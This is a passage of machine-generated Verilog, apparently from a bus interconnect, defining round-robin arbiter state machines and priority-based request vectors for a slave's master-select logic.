                        s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[6] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[7] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[0] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[1] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[2] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant4:
        begin
            if (  !( s2_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[5] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[6] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[7] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[0] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[1] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[2] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[3] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant5:
        begin
            if (  !( s2_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[6] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[7] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[0] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[1] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[2] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[3] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[4] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant6:
        begin
            if (  !( s2_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[7] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[0] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[1] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[2] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[3] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[4] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[5] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant7:
        begin
            if (  !( s2_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[0] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[1] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[2] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[3] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[4] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[5] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[6] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s2_msel_arb1_req = { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd1 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd1 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd1 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd1 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd1 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd1 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd1 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s2_msel_arb1_state <= s2_msel_arb1_grant0;
        end
        else
        begin 
            s2_msel_arb1_state <= s2_msel_arb1_next_state;
        end
    end
    always @ (  s2_msel_arb1_state or  { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd1 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd1 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd1 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd1 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd1 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd1 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd1 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s2_msel_arb1_next_state = s2_msel_arb1_state;
        case ( s2_msel_arb1_state ) 
        s2_msel_arb1_grant0:
        begin
            if (  !( s2_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[1] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[2] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[3] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[4] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[5] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[6] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[7] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant1:
        begin
            if (  !( s2_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[2] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[3] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[4] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[5] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[6] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[7] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[0] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant2:
        begin
            if (  !( s2_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[3] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[4] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[5] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[6] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[7] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[0] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[1] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant3:
        begin
            if (  !( s2_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[4] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[5] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[6] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[7] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[0] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[1] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[2] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant4:
        begin
            if (  !( s2_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[5] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[6] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[7] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[0] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[1] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[2] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[3] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant5:
        begin
            if (  !( s2_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[6] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[7] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[0] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[1] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[2] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[3] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[4] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant6:
        begin
            if (  !( s2_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[7] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[0] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[1] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[2] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[3] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[4] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[5] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb1_grant7:
        begin
            if (  !( s2_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s2_msel_arb1_req[0] ) 
                begin
                    s2_msel_arb1_next_state = s2_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s2_msel_arb1_req[1] ) 
                    begin
                        s2_msel_arb1_next_state = s2_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s2_msel_arb1_req[2] ) 
                        begin
                            s2_msel_arb1_next_state = s2_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s2_msel_arb1_req[3] ) 
                            begin
                                s2_msel_arb1_next_state = s2_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s2_msel_arb1_req[4] ) 
                                begin
                                    s2_msel_arb1_next_state = s2_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb1_req[5] ) 
                                    begin
                                        s2_msel_arb1_next_state = s2_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb1_req[6] ) 
                                        begin
                                            s2_msel_arb1_next_state = s2_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s2_msel_arb2_req = { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd2 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd2 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd2 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd2 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd2 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd2 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd2 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s2_msel_arb2_state <= s2_msel_arb2_grant0;
        end
        else
        begin 
            s2_msel_arb2_state <= s2_msel_arb2_next_state;
        end
    end
    always @ (  s2_msel_arb2_state or  { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd2 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd2 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd2 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd2 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd2 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd2 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd2 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s2_msel_arb2_next_state = s2_msel_arb2_state;
        case ( s2_msel_arb2_state ) 
        s2_msel_arb2_grant0:
        begin
            if (  !( s2_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[1] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[2] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[3] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[4] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[5] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[6] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[7] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant1:
        begin
            if (  !( s2_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[2] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[3] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[4] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[5] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[6] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[7] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[0] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant2:
        begin
            if (  !( s2_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[3] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[4] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[5] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[6] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[7] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[0] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[1] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant3:
        begin
            if (  !( s2_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[4] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s2_msel_arb2_req[5] ) 
                    begin
                        s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s2_msel_arb2_req[6] ) 
                        begin
                            s2_msel_arb2_next_state = s2_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s2_msel_arb2_req[7] ) 
                            begin
                                s2_msel_arb2_next_state = s2_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s2_msel_arb2_req[0] ) 
                                begin
                                    s2_msel_arb2_next_state = s2_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb2_req[1] ) 
                                    begin
                                        s2_msel_arb2_next_state = s2_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb2_req[2] ) 
                                        begin
                                            s2_msel_arb2_next_state = s2_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb2_grant4:
        begin
            if (  !( s2_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s2_msel_arb2_req[5] ) 
                begin
                    s2_msel_arb2_next_state = s2_msel_arb2_grant5;
                end
                else
                begin 
